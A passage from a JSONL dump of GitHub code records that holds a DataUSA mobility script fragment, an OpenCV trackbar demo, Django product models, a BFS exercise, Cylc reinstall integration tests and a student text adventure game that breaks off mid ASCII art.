df_google[~df_google[\"Geography\"].isna()]\ndf_google[\"ID Geography\"] = df_google[\"Geography\"].replace(states).replace(stateToFips)\ndf_google[\"Date\"] = df_google[\"Date\"].str.replace(\"-\", \"/\")\n\npath = os.path.dirname(os.path.abspath(\"__file__\")) + \"/static/mobilitycovid19.json\"\n\nprevious = pd.read_json(path) if os.path.exists(path) else pd.DataFrame([])\nif len(df_google) > len(previous):\n df_google.to_json(path, orient=\"records\")\n","repo_name":"DataUSA/datausa-site","sub_path":"mobilitycovid19.py","file_name":"mobilitycovid19.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"47"} +{"seq_id":"42669849083","text":"import numpy as np\r\nimport cv2 as cv\r\n\r\nimg = np.zeros((300,512, 3), np.uint8)\r\ncv.namedWindow('image')\r\ndef change(x):\r\n print(x)\r\n\r\ncv.createTrackbar('B', 'image', 0, 255, change)\r\ncv.createTrackbar('G', 'image', 0, 255, change)\r\ncv.createTrackbar('R', 'image', 0, 255, change)\r\n\r\nwhile(1):\r\n cv.imshow('image',img)\r\n k = cv.waitKey(1) & 0xFF\r\n if k == 27:\r\n break\r\n b = cv.getTrackbarPos('B','image')\r\n g = cv.getTrackbarPos('G','image')\r\n r = cv.getTrackbarPos('R','image')\r\n img[:] = [b,g,r]\r\n cv.imshow('image', img)\r\ncv.destroyAllWindows()","repo_name":"mystery2828/Image_processing","sub_path":"part8.py","file_name":"part8.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9418694527","text":"from django.db import models\n\n\nclass CategoriesProducts(models.Model):\n \"\"\"Таблица с категориями ФБ товаров/\n Сожержит единственную графу category, в которой хранится название категорий ФБ\"\"\"\n category = models.CharField(verbose_name='Категория', name='category', max_length=144)\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def __str__(self):\n return self.category\n\n\nclass ProductFB(models.Model):\n \"\"\"Единица товара ФБ\n name - наименование товара\n price -цена товара\n count - их количество\n category - связь на таблицу CategoriesProducts, чтобы привязать к конкретной категории\n description - описание товара\n modal - хранит от значение от 1-n, нужна чтобы отслеживать какой товар нажимается\"\"\"\n name = models.CharField(verbose_name='Наименование товара', name='name', max_length=144)\n price = models.DecimalField(verbose_name='Цена', name='price', decimal_places=2, max_digits=10)\n count = models.IntegerField(verbose_name='Количество', name='count')\n category = models.ForeignKey(CategoriesProducts, on_delete=models.CASCADE)\n description = models.TextField(verbose_name='Описание', name='description')\n modal = models.CharField(name=\"modal\", max_length=128)\n # добавить строку урлов, в которой будет хранится сами файлы с данными\n # добавить класс таблицу с уралами\n\n class Meta:\n verbose_name = 'Товар'\n verbose_name_plural = 'Товары'\n\n def __str__(self):\n return self.name","repo_name":"aliensowo/lavka","sub_path":"facebook/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71364813904","text":"import sys\nimport collections\ntest = int(input())\n\n\nfor _ in range(test):\n n,m = map(int,sys.stdin.readline().rstrip().split())\n graph = [[] for _ in range(n+1)]\n queue = collections.deque()\n for i in range(m):\n a,b = map(int,sys.stdin.readline().rstrip().split())\n graph[a].append(b)\n graph[b].append(a)\n visited = [False]*(n+1)\n start = 1\n cnt =0\n queue.append(start)\n visited[start]=True\n while queue:\n cur = queue.popleft()\n for temp in graph[cur]:\n if visited[temp]==False:\n queue.append(temp)\n visited[temp] = True\n cnt+=1\n print(cnt)\n\n","repo_name":"CodeTest-StudyGroup/Code-Test-Study","sub_path":"seokgyuHong/백준/상근이의여행.py","file_name":"상근이의여행.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1095,"dataset":"github-code","pt":"47"} +{"seq_id":"13857673426","text":"from pathlib import Path\nfrom types import SimpleNamespace\nfrom uuid import uuid1\n\nimport pytest\n\nfrom cylc.flow.exceptions import (\n WorkflowFilesError,\n)\nfrom cylc.flow.install import (\n reinstall_workflow,\n)\nfrom cylc.flow.option_parsers import Options\nfrom cylc.flow.scripts.reinstall import (\n get_option_parser as reinstall_gop,\n reinstall_cli,\n)\nfrom cylc.flow.terminal import cli_function\nfrom cylc.flow.workflow_files import (\n WorkflowFiles,\n)\n\n\nReInstallOptions = Options(reinstall_gop())\n\n# cli opts\n\n# interactive: yes no\n# rose: yes no\n# workflow_running: yes no\n\n\n@pytest.fixture\ndef interactive(monkeypatch):\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall.is_terminal',\n lambda: True,\n )\n\n\n@pytest.fixture\ndef non_interactive(monkeypatch):\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall.is_terminal',\n lambda: False,\n )\n\n\n@pytest.fixture\ndef one_src(tmp_path):\n src_dir = tmp_path\n (src_dir / 'flow.cylc').touch()\n (src_dir / 'rose-suite.conf').touch()\n return SimpleNamespace(path=src_dir)\n\n\n@pytest.fixture\ndef one_run(one_src, test_dir, run_dir):\n w_run_dir = test_dir / str(uuid1())\n w_run_dir.mkdir()\n (w_run_dir / 'flow.cylc').touch()\n (w_run_dir / 'rose-suite.conf').touch()\n install_dir = (w_run_dir / WorkflowFiles.Install.DIRNAME)\n install_dir.mkdir(parents=True)\n (install_dir / WorkflowFiles.Install.SOURCE).symlink_to(\n one_src.path,\n target_is_directory=True,\n )\n return SimpleNamespace(\n path=w_run_dir,\n id=str(w_run_dir.relative_to(run_dir)),\n )\n\n\ndef test_rejects_random_workflows(one):\n \"\"\"It should only work with workflows installed by cylc install.\"\"\"\n with pytest.raises(WorkflowFilesError) as exc_ctx:\n reinstall_cli(opts=ReInstallOptions(), args=one.workflow)\n assert 'was not installed with cylc install' in str(exc_ctx.value)\n\n\ndef test_invalid_source_dir(one_src, one_run):\n \"\"\"It should detect & fail for an invalid source symlink\"\"\"\n source_link = Path(\n one_run.path,\n WorkflowFiles.Install.DIRNAME,\n WorkflowFiles.Install.SOURCE,\n )\n source_link.unlink()\n source_link.symlink_to(one_src.path / 'flow.cylc')\n\n with pytest.raises(WorkflowFilesError) as exc_ctx:\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert 'Workflow source dir is not accessible' in str(exc_ctx.value)\n\n\ndef test_no_changes_needed(one_src, one_run, capsys, interactive):\n \"\"\"It should not reinstall if no changes are needed.\n\n This is not a hard requirement, in practice rsync output may differ\n from expectation so this is a nice-to-have, not expected to work 100%\n of the time.\n \"\"\"\n assert not reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert 'up to date with' in capsys.readouterr().out\n\n\ndef test_non_interactive(one_src, one_run, capsys, capcall, non_interactive):\n \"\"\"It should not perform a dry-run or prompt in non-interactive mode.\"\"\"\n # capture reinstall calls\n reinstall_calls = capcall(\n 'cylc.flow.scripts.reinstall.reinstall_workflow',\n reinstall_workflow,\n )\n # give it something to reinstall\n (one_src.path / 'a').touch()\n # reinstall\n assert reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n # only one rsync call should have been made (i.e. no --dry-run)\n assert len(reinstall_calls) == 1\n assert 'Successfully reinstalled' in capsys.readouterr().out\n\n\ndef test_interactive(\n one_src,\n one_run,\n capsys,\n capcall,\n interactive,\n monkeypatch\n):\n \"\"\"It should perform a dry-run and prompt in interactive mode.\"\"\"\n # capture reinstall calls\n reinstall_calls = capcall(\n 'cylc.flow.scripts.reinstall.reinstall_workflow',\n reinstall_workflow,\n )\n # give it something to reinstall\n (one_src.path / 'a').touch()\n\n # reinstall answering \"no\" to any prompt\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall._input',\n lambda x: 'n'\n )\n assert reinstall_cli(opts=ReInstallOptions(), args=one_run.id) is False\n\n # only one rsync call should have been made (i.e. the --dry-run)\n assert [call[1].get('dry_run') for call in reinstall_calls] == [True]\n assert 'Reinstall canceled, no changes made.' in capsys.readouterr().out\n reinstall_calls.clear()\n\n # reinstall answering \"yes\" to any prompt\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall._input',\n lambda x: 'y'\n )\n assert reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n\n # two rsync calls should have been made (i.e. the --dry-run and the real)\n assert [call[1].get('dry_run') for call in reinstall_calls] == [\n True, False\n ]\n assert 'Successfully reinstalled' in capsys.readouterr().out\n\n\ndef test_workflow_running(\n one_src,\n one_run,\n monkeypatch,\n capsys,\n non_interactive,\n):\n \"\"\"It should advise running \"cylc reload\" where applicable.\"\"\"\n # the message we are expecting\n reload_message = f'Run \"cylc reload {one_run.id}\"'\n\n # reinstall with a stopped workflow (reload message shouldn't show)\n assert reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert reload_message not in capsys.readouterr().out\n\n # reinstall with a running workflow (reload message should show)\n monkeypatch.setattr(\n # make it look like the workflow is running\n 'cylc.flow.scripts.reinstall.load_contact_file',\n lambda x: None,\n )\n assert reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert reload_message in capsys.readouterr().out\n\n\ndef test_rsync_stuff(one_src, one_run, capsys, non_interactive):\n \"\"\"Make sure rsync is working correctly.\"\"\"\n # src contains files: a, b\n (one_src.path / 'a').touch()\n with open(one_src.path / 'b', 'w+') as b_file:\n b_file.write('x')\n (one_src.path / 'b').touch()\n\n # run contains files: b, c (where b is different to the source copy)\n (one_run.path / 'b').touch()\n (one_run.path / 'c').touch()\n\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n\n # a should have been left\n assert (one_run.path / 'a').exists()\n # b should have been updated\n assert (one_run.path / 'b').exists()\n with open(one_run.path / 'b', 'r') as b_file:\n assert b_file.read() == 'x'\n # c should have been removed\n assert not (one_run.path / 'c').exists()\n\n\ndef test_rose_warning(one_src, one_run, capsys, interactive, monkeypatch):\n \"\"\"It should warn that Rose installed files will be deleted.\n\n See https://github.com/cylc/cylc-rose/issues/149\n \"\"\"\n # fragment of the message we expect\n rose_message = (\n 'Files created by Rose file installation will show as deleted'\n )\n\n # reinstall answering \"no\" to any prompt\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall._input',\n lambda x: 'n'\n )\n (one_src.path / 'a').touch() # give it something to install\n\n # reinstall (with rose-suite.conf file)\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert rose_message in capsys.readouterr().err\n\n # reinstall (no rose-suite.conf file)\n (one_src.path / 'rose-suite.conf').unlink()\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert rose_message not in capsys.readouterr().err\n\n\ndef test_keyboard_interrupt(\n one_src,\n one_run,\n interactive,\n monkeypatch,\n capsys\n):\n \"\"\"It should handle a KeyboardInterrupt during dry-run elegantly.\n\n E.G. A user may ctrl+c rather than answering \"n\" (for no). To make it\n clear a canceled message should show.\n \"\"\"\n def raise_keyboard_interrupt():\n raise KeyboardInterrupt()\n\n # currently the first call in the dry-run branch\n monkeypatch.setattr(\n 'cylc.flow.scripts.reinstall.is_terminal',\n raise_keyboard_interrupt,\n )\n\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert 'Reinstall canceled, no changes made' in capsys.readouterr().out\n\n\ndef test_rsync_fail(one_src, one_run, mock_glbl_cfg, non_interactive):\n \"\"\"It should raise an error on rsync failure.\"\"\"\n mock_glbl_cfg(\n 'cylc.flow.install.glbl_cfg',\n '''\n [platforms]\n [[localhost]]\n rsync command = false\n ''',\n )\n\n (one_src.path / 'a').touch() # give it something to install\n with pytest.raises(WorkflowFilesError) as exc_ctx:\n reinstall_cli(opts=ReInstallOptions(), args=one_run.id)\n assert 'An error occurred reinstalling' in str(exc_ctx.value)\n","repo_name":"cylc/cylc-flow","sub_path":"tests/integration/test_reinstall.py","file_name":"test_reinstall.py","file_ext":"py","file_size_in_byte":8587,"program_lang":"python","lang":"en","doc_type":"code","stars":304,"dataset":"github-code","pt":"47"} +{"seq_id":"72952305423","text":"\"\"\"\nJoshua Chuah\nA01334966\n\"\"\"\nimport random\nimport time\nimport sys\nimport itertools\nimport typing\n\n\ndef make_board(rows: int, columns: int) -> dict:\n \"\"\"\n creates and returns board containing coordinates filled with information\n\n :param rows: an integer\n :param columns: an integer\n :precondition: rows must be an integer\n :precondition: columns must be an integer\n :postcondition: creates a board containing tuples as coordinates filled with location names\n :postcondition: creates a board containing tuples as coordinates filled with location names\n :return: a board containing tuples as coordinates filled with location names\n >>> make_board(5, 5)\n {(0, 0): ['Stowry Village'], (0, 1): ['Margrove Pass'], (0, 2): ['Entia Field'], (0, 3): ['Entia Field'], (0, 4): ['Makna Harbour'], (1, 0): ['Margrove Pass'], (1, 1): ['Margrove Pass'], (1, 2): ['Entia Field'], (1, 3): ['Entia Field'], (1, 4): ['Entia Capital City'], (2, 0): ['Entia Field'], (2, 1): ['Entia Field'], (2, 2): ['Entia Field'], (2, 3): ['Satorl Forest'], (2, 4): ['Entia Field'], (3, 0): ['Entia Field'], (3, 1): ['Entia Field'], (3, 2): ['Entia Field'], (3, 3): ['Satorl Forest'], (3, 4): ['Entia Field'], (4, 0): ['Entia Field'], (4, 1): ['Entia Field'], (4, 2): ['Entia Field'], (4, 3): [\"Drakon's Castle\"], (4, 4): ['Entia Field']}\n \"\"\"\n board = {}\n\n for row in range(rows):\n for column in range(columns):\n board[(row, column)] = [\"Entia Field\"]\n\n board[(0, 0)] = [\"Stowry Village\"]\n board[(1, 0)] = ['Margrove Pass']\n board[(0, 1)] = ['Margrove Pass']\n board[(1, 1)] = ['Margrove Pass']\n board[(2, 3)] = [\"Entia Lake\"]\n board[(4, 3)] = [\"Drakon's Castle\"]\n board[(1, 4)] = [\"Entia Capital City\"]\n board[(0, 4)] = [\"Makna Harbour\"]\n board[(3, 3)] = [\"Satorl Forest\"]\n board[(2, 3)] = [\"Satorl Forest\"]\n return board\n\n\ndef make_character() -> dict[str, int | str | typing.Any]:\n \"\"\"\n character creation function. Name your character and choose a class to play.\n\n :return: a dictionary containing information about the character\n \"\"\"\n character = input('Input your name: \\n')\n player_info = {'Name': character, 'X': 0, 'Y': 0, 'Level': 1, 'Current_HP': 34, 'Max_HP': 34, 'XP': 0, 'Class': 'Basic', 'Boss_Status': 'Alive'}\n\n def character_class() -> list:\n \"\"\"\n choose from a list of classes and their subclasses\n\n :return: a list containing class and subclass that the user chooses\n \"\"\"\n sub_class_choice = ''\n print('\\nIn the vast lands of Entia, there are 3 warrior professions, each excelling in different categories.'\n f'\\nSwordsman: Masters at the sword, guarantees high damage output, but at a cost.'\n f'\\nMage: Masters of magic. Cast down elementals that deal a good amount of damage'\n f'\\nTank: High defence, can sponge a lot of hits before going down.\\n')\n while True:\n main_class = ['Swordsman', 'Mage', 'Tank']\n for index in enumerate(main_class):\n print(index)\n class_options = input('\\nChoose a profession: \\n').title()\n\n if class_options == '0':\n class_choice = 'Swordsman'\n break\n elif class_options == '1':\n class_choice = 'Mage'\n break\n elif class_options == '2':\n class_choice = 'Tank'\n break\n else:\n print('Invalid profession!\\n')\n\n print('Great! You chose', class_choice)\n print('Now its time to select a subclass...')\n\n if class_options == '0':\n print('''\\nThere are two types of swordsmen, each providing their pros and cons\n Samurai: Dances around the battle field with their swift movement, striking their opponents down with a katana. [High damage, low defence].\n Berserker: An immovable object meets an unstoppable force to form a warrior who stops at nothing to strike the enemy down. [High damage, high defence].\\n''')\n while True:\n sword_sub = ['Samurai', 'Berserker']\n for index in enumerate(sword_sub):\n print(index)\n sub_class_options = input('Choose a subclass: \\n 0: Samurai \\n 1: Berserker \\n').title()\n if sub_class_options == '0':\n sub_class_choice = 'Samurai'\n break\n elif sub_class_options == '1':\n sub_class_choice = 'Berserker'\n break\n else:\n print('Invalid sub class!')\n elif class_options == '1':\n print('''\\nThere are two types of mages, each casting their own unique elementals\n Sorcerer: Specializes in sorcery, witchcraft and black magic. [High damage, low defence, high mana consumption].\n Elementalist: Utilizes the four elementals to inflict damage on their foes. [Medium damage, medium defence, medium mana consumption].\\n''')\n while True:\n mage_sub = ['Sorcerer', 'Elementalist']\n for index in enumerate(mage_sub):\n print(index)\n sub_class_options = input('\\nChoose a subclass:').title()\n if sub_class_options == '0':\n sub_class_choice = 'Sorcerer'\n break\n elif sub_class_options == '1':\n sub_class_choice = 'Elementalist'\n break\n else:\n print('Invalid sub class!')\n elif class_options == '2':\n print('''\\nThere is only one Tank type\n Paladin: The only tank type. Never afraid of a fight with their high hp, and armour to tank all the hits. [Low damage, very high defence].\\n''')\n while True:\n sub_class_options = input('Choose a subclass: \\n Paladin \\n').title()\n if sub_class_options == 'Paladin':\n sub_class_choice = 'Paladin'\n break\n else:\n print('Invalid sub class!')\n\n print('\\nGreat! you have finished character customization!\\n\\n')\n print('Class:', class_choice, '\\nSub Class:', sub_class_choice)\n return [class_choice, sub_class_choice]\n\n player_class = character_class()\n player_info['Class'] = player_class[1]\n return player_info\n\n\ndef player_stats(character: dict) -> dict:\n \"\"\"\n sets stats for the character after choosing a subclass\n\n :param character: a dictionary\n :precondition: character must be a dictionary\n :postcondition: inputs information about the character to the dictionary\n :return: a dictionary with character information\n >>> player_stats({'Class': 'Samurai'})\n {'Class': 'Samurai', 'Current_HP': 56, 'Max_HP': 56, 'Attack': 29, 'Defence': 12}\n >>> player_stats({'Class': 'Sorcerer'})\n {'Class': 'Sorcerer', 'Current_HP': 48, 'Max_HP': 48, 'Attack': 34, 'Defence': 11}\n \"\"\"\n if character['Class'] == 'Samurai':\n character['Current_HP'] = 56\n character['Max_HP'] = 56\n character['Attack'] = 29\n character['Defence'] = 12\n elif character['Class'] == 'Berserker':\n character['Current_HP'] = 67\n character['Max_HP'] = 67\n character['Attack'] = 21\n character['Defence'] = 21\n elif character['Class'] == 'Sorcerer':\n character['Current_HP'] = 48\n character['Max_HP'] = 48\n character['Attack'] = 34\n character['Defence'] = 11\n elif character['Class'] == 'Elementalist':\n character['Current_HP'] = 73\n character['Max_HP'] = 73\n character['Attack'] = 18\n character['Defence'] = 18\n elif character['Class'] == 'Paladin':\n character['Current_HP'] = 87\n character['Max_HP'] = 87\n character['Attack'] = 14\n character['Defence'] = 28\n return character\n\n\ndef player_move_set(character: dict) -> dict:\n \"\"\"\n sets the players move set after choosing a subclass\n\n :param character: a dictionary\n :precondition: character must be a dictionary\n :postcondition: inputs character move set into the dictionary\n :return: a dictionary containing character information\n >>> player_move_set({'Class': 'Basic', 'Attack': 34})\n {'Class': 'Basic', 'Attack': 34, 'Move_Set': {'Run': 0, 'Punch': 34}}\n \"\"\"\n special = random.randint(5, 16)\n character['Move_Set'] = {'Run': 0}\n if character['Class'] == 'Basic':\n character['Move_Set']['Punch'] = character['Attack']\n elif character['Class'] == 'Samurai':\n character['Move_Set']['Swift Strike'] = character['Attack']\n character['Move_Set']['Shadow Blade'] = character['Attack'] + special\n character['Move_Set']['Soul Strike'] = character['Attack'] - 10\n elif character['Class'] == 'Berserker':\n character['Move_Set']['Running Slash'] = character['Attack']\n character['Move_Set']['Punishing Blow'] = character['Attack'] * 2\n character['Move_Set']['Crushing Knee'] = character['Attack'] - special\n elif character['Class'] == 'Sorcerer':\n character['Move_Set']['Magic Missile'] = character['Attack']\n character['Move_Set']['Pentagram Beam'] = character['Attack'] * special\n character['Move_Set']['Starlight Kick'] = character['Attack'] - 5\n elif character['Class'] == 'Elementalist':\n character['Move_Set']['Howling Wind'] = character['Attack']\n character['Move_Set']['Fire-Lightning Ball'] = character['Attack'] - 10\n character['Move_Set']['Enchanting Water Spirit'] = character['Attack'] * 3\n elif character['Class'] == 'Paladin':\n character['Move_Set']['Hammer Down'] = character['Attack']\n character['Move_Set'][\"Paladin's Fury\"] = character['Attack'] + special\n return character\n\n\ndef describe_current_location(board: dict, character: dict) -> tuple:\n \"\"\"\n describes to the user where they are on the board.\n\n :param board: a dictionary\n :param character: a dictionary\n :precondition: board must be a dictionary\n :precondition: character must be a dictionary\n :postcondition: checks where the player is in relation to the board\n :postcondition: checks where the player is in relation to the board\n :return: a tuple containing the player's current coordinates\n >>> describe_current_location({(2, 2): ['Entia Field']}, {'X': 2, 'Y': 2})\n You are located at (2, 2) ['Entia Field']\n A vast field connecting each part of Entia\n (2, 2)\n >>> describe_current_location({(4, 3): ['Entia Capital City']}, {'X': 4, 'Y': 3})\n You are located at (4, 3) ['Entia Capital City']\n The capital city of Entia, houses many shops to buy goods from.\n (4, 3)\n \"\"\"\n character_location = character['X'], character['Y']\n print(f'You are located at', character_location, board[character_location])\n if board[character_location] == ['Entia Field']:\n print(f'A vast field connecting each part of Entia')\n elif board[character_location] == ['Entia Capital City']:\n print(f\"The capital city of Entia, houses many shops to buy goods from.\")\n elif board[character_location] == ['Entia Lake']:\n print(f\"Home of the Varya, Entia's water tribe. Very deadly if you get on the wrong terms.\")\n elif board[character_location] == ['Makna Harbour']:\n print(f\"Many imports come this way. All goods brought to Drakon\")\n elif board[character_location] == [\"Satorl Forest\"]:\n print(f\"Home of Drakon. This area is mostly dead and all signs of civilization has vanished.\")\n elif board[character_location] == ['Stowry Village']:\n print(f\"{character['Name']}'s home. There is a very nostalgic feeling every time you are here...\")\n print(f\"If you are ever in need of health, come here to restore some health!\")\n if character['Current_HP'] < character['Max_HP']:\n character['Current_HP'] += random.randint(10, character['Max_HP'])\n print(f'Your health has been restored to max!')\n elif board[character_location] == ['Margrove Pass']:\n print(\n 'The border between Stowry Village and Entia Field. This desolate area keeps residence of Stowry stuck. Home to many monsters...')\n return character_location\n\n\ndef get_user_choice() -> str:\n \"\"\"\n user picks a direction to go\n\n :return: a string containing the users choice\n \"\"\"\n directions = ['North', 'East', 'South', 'West', 'Quit']\n while True:\n for index in enumerate(directions):\n print(index)\n user_choice = input('\\nPick a direction to move: \\n')\n if user_choice == '0':\n user_choice = 'North'\n break\n elif user_choice == '1':\n user_choice = 'East'\n break\n elif user_choice == '2':\n user_choice = 'South'\n break\n elif user_choice == '3':\n user_choice = 'West'\n break\n elif user_choice == '4':\n print('GAME OVER!')\n sys.exit()\n else:\n print('Invalid option, please type something from this list\\n\\n')\n return user_choice\n\n\ndef validate_move(character: dict, direction: str) -> bool:\n \"\"\"\n validates the move of the character. checks if the move that they are doing is valid.\n\n :param character: a dictionary\n :param direction: a string\n :precondition: character must be a dictionary\n :precondition: direction must be a string\n :postcondition: checks if the player's coordinates are out of bounds\n :postcondition: checks if the direction is a valid direction\n :return: a boolean value depending on if the user's move is valid\n >>> validate_move({'Y': 4}, 'North')\n False\n >>> validate_move({'Y': 4}, 'South')\n True\n \"\"\"\n if direction == 'North' and character['Y'] == 4:\n return False\n elif direction == 'South' and character['Y'] == 0:\n return False\n elif direction == 'East' and character['X'] == 4:\n return False\n elif direction == 'West' and character['X'] == 0:\n return False\n else:\n return True\n\n\ndef move_character(character: dict, direction: str) -> None:\n \"\"\"\n will move the character depending on their move\n\n :param character: character is a dictionary\n :param direction: direction is a string\n :precondition: character must be a dictionary\n :precondition: direction must be a string\n :postcondition: change the player's coordinates depending on their move\n :postcondition: checks the direction to see where to move the character\n :return: does not return anything\n >>> move_character({'Y': 1}, 'North')\n\n >>> move_character({'X': 3}, 'East')\n\n \"\"\"\n if direction == 'North':\n character['Y'] += 1\n elif direction == 'East':\n character['X'] += 1\n elif direction == 'South':\n character['Y'] -= 1\n elif direction == 'West':\n character['X'] -= 1\n\n\ndef check_for_challenges(character: dict) -> bool:\n \"\"\"\n checks if there is a challenge\n\n :param character: character is a dictionary\n :precondition: character must be a dictionary\n :postcondition: checks if there is a challenge for the user\n :return: returns a boolean value depending on if there is a challenge for the user\n >>> check_for_challenges({'X': 1, 'Y': 0})\n True\n >>> check_for_challenges({'X': 0, 'Y': 0})\n False\n \"\"\"\n if character['X'] == 1 and character['Y'] == 0:\n return True\n elif character['X'] == 0 and character['Y'] == 1:\n return True\n elif character['X'] == 1 and character['Y'] == 1:\n return True\n elif character['X'] == 4 and character['Y'] == 3:\n return True\n\n is_battle = random.randint(0, 20)\n if is_battle > 15:\n return True\n else:\n return False\n\n\ndef execute_challenge_protocol(character: dict) -> None:\n \"\"\"\n will execute a challenge for the user depending on their level\n\n :param character: character is a dictionary\n :precondition: character must be a dictionary\n :postcondition: execute a challenge for the user depending on their level\n :return: None\n \"\"\"\n if character['Level'] == 1:\n return execute_battle(character, 'easy')\n elif character['Level'] == 2:\n return execute_battle(character, 'medium')\n elif character['Level'] == 3:\n return execute_battle(character, 'hard')\n\n\ndef execute_battle(character: dict, difficulty: str) -> None:\n \"\"\"\n checks the user's level and scales the enemies damage. Then it initiates the battle sequence.\n\n :param character: character is a dictionary\n :param difficulty: difficulty is a string\n :precondition: character must be a dictionary\n :precondition: difficulty must be a string\n :postcondition: scales the enemies damage accordingly\n :postcondition: scales the enemies damage accordingly\n :return: None\n \"\"\"\n enemy = choose_enemy(character)\n if enemy['Name'] == \"Drakon\":\n execute_boss(character, enemy)\n return None\n if difficulty == 'medium':\n enemy['Attack'] *= 2\n enemy['Current_HP'] *= 2\n enemy['Max_HP'] *= 2\n enemy['Defence'] *= 2\n print(enemy)\n if difficulty == 'hard':\n enemy['Attack'] *= 3\n enemy['Current_HP'] *= 3\n enemy['Max_HP'] *= 3\n enemy['Defence'] *= 3\n print(enemy)\n while enemy['Current_HP'] > 0:\n if character['Current_HP'] < 0:\n print(f'GAME OVER! Your journey comes to an unfortunate end...')\n print(f'\\nThanks for playing!')\n sys.exit()\n print(f\"You are going against {enemy['Name']}\")\n print(\"What's your move?\")\n for index in enumerate(character['Move_Set']):\n print(index)\n user_choice = int(input(''))\n if user_choice == 0:\n print(f'You ran away! What a bummer...')\n print(f\"You lose {enemy['Attack']} HP\")\n character['Current_HP'] -= enemy['Attack']\n return None\n elif user_choice < len(character['Move_Set'].keys()):\n move = (character['Move_Set'][list(character['Move_Set'].keys())[user_choice]])\n enemy['Current_HP'] -= move\n print('You dealt', move, 'Damage!')\n if random.randint(0, 1) == 1:\n character['Current_HP'] -= enemy['Attack']\n print(f\"{enemy['Name']} dealt {enemy['Attack']} damage!\")\n else:\n print(f\"{enemy['Name']} missed!\")\n else:\n print(f\"Invalid selection, please select a number from the move set\")\n\n print(f'You defeated {enemy[\"Name\"]}!')\n character['XP'] += enemy['XP_Gain']\n\n\ndef filtered_enemies(enemies: dict) -> bool:\n \"\"\"\n checks if the enemies in the list is a 'varyan' or a 'guard'\n\n :param enemies: a dictionary\n :precondition: enemies must be a dictionary\n :postcondition: checks if the enemy in the list is of a specific type\n :return: boolean value depending on if the enemy type is True or False\n >>> filtered_enemies({'Name': 'varyan'})\n True\n >>> filtered_enemies({'Name': 'hotdog'})\n False\n \"\"\"\n if enemies['Name'] != \"varyan\" and enemies['Name'] != \"guard\":\n return False\n else:\n return True\n\n\ndef choose_enemy(character: dict) -> dict | str:\n \"\"\"\n choose the enemy for the user to fight\n\n :param character: a dictionary\n :precondition: character must be a dictionary\n :postcondition: randomly select an enemy for the user to battle\n :return: returns a dictionary containing the enemy information or a string that leads to the dictionary name\n \"\"\"\n varyan = {'Name': 'Varyan Warrior', 'Current_HP': 37, 'Max_HP': 37, 'Attack': 18, 'Defence': 17, 'XP_Gain': 177}\n guard = {'Name': 'Demon Guard', 'Current_HP': 54, 'Max_HP': 54, 'Attack': 34, 'Defence': 32, 'XP_Gain': 254}\n imp = {'Name': 'Imp', 'Current_HP': 13, 'Max_HP': 13, 'Attack': 9, 'Defence': 9, 'XP_Gain': 56}\n goblin = {'Name': 'Goblin', 'Current_HP': 19, 'Max_HP': 19, 'Attack': 16, 'Defence': 17, 'XP_Gain': 123}\n slime = {'Name': 'Slime', 'Current_HP': 7, 'Max_HP': 7, 'Attack': 5, 'Defence': 4, 'XP_Gain': 43}\n drakon = {'Name': \"Drakon\", 'Current_HP': 256, 'Max_HP': 256, 'Attack': 82, 'Defence': 54}\n rand_num = random.randint(0, 1)\n enemies = [varyan, guard, imp, goblin, slime, drakon]\n harbour_guard = [enemy for enemy in enemies]\n selection = filter(filtered_enemies, enemies)\n final_selection = harbour_guard[rand_num]\n if character['X'] == 2 and character['Y'] == 3:\n return varyan\n if character['X'] == 4 and character['Y'] == 3 and character['Level'] == 3:\n return drakon\n if character['X'] == 0 and character['Y'] == 4:\n return final_selection\n if selection == 0:\n return imp\n elif selection == 1:\n return goblin\n else:\n return slime\n\n\ndef execute_boss(character: dict, enemy: dict) -> None:\n \"\"\"\n the final boss battle. the user must be level three for this function to initiate\n\n :param character: a dictionary\n :param enemy: a dictionary\n :precondition: character must be a dictionary\n :precondition: enemy must be a dictionary\n :postcondition: will initiate the final boss battle\n :postcondition: will initiate the final boss battle\n :return: None\n >>> execute_boss({'Level': 3, 'X': 4, 'Y': 3, 'XP': 0, 'Current_HP': 540, 'Max_HP': 540, 'Attack': 156, 'Defence': 156, 'Class': 'Basic', 'Move_Set': {'Run': 0, 'Punch': 156}},{'Name': \"Drakon\", 'Current_HP': 256, 'Max_HP': 256, 'Attack': 82, 'Defence': 54})\n\n \"\"\"\n print('''\n\n\n ε ╣],\n Γ]╣╪╠▓▓╣▒ ⌐\n [╫▐╣▓╬▓▓╬▓▌▓ ƒ\n ╣▓▓▓▓▓╬▓╣▓▓╬▓▌\n ~- ╗█▓▓█▓▓▓▓▓▓▓▓╬▓ É\n ,,,\"w▌, ▐▓▓█╨╙▓▓█▀╙██▓█▌ - ,╓≈\"`\n .,╠▓▓▓▓▓▓▓▓▓▄,╙██▒∩».└ ;░╠███▓▓▓╠▄▄▓▓▓╨╙╙└\n `\"\"▓▓▓███████████▓╬╝▌#µ░░φå▌╬████████▓█▓▓▓▓Mw\n ▄▀▀└,▄▄▓███████▀╙╙╚▒└^│,│`╙╗╬░╙╟████████▌╙▀▓▓ └▀w,\n 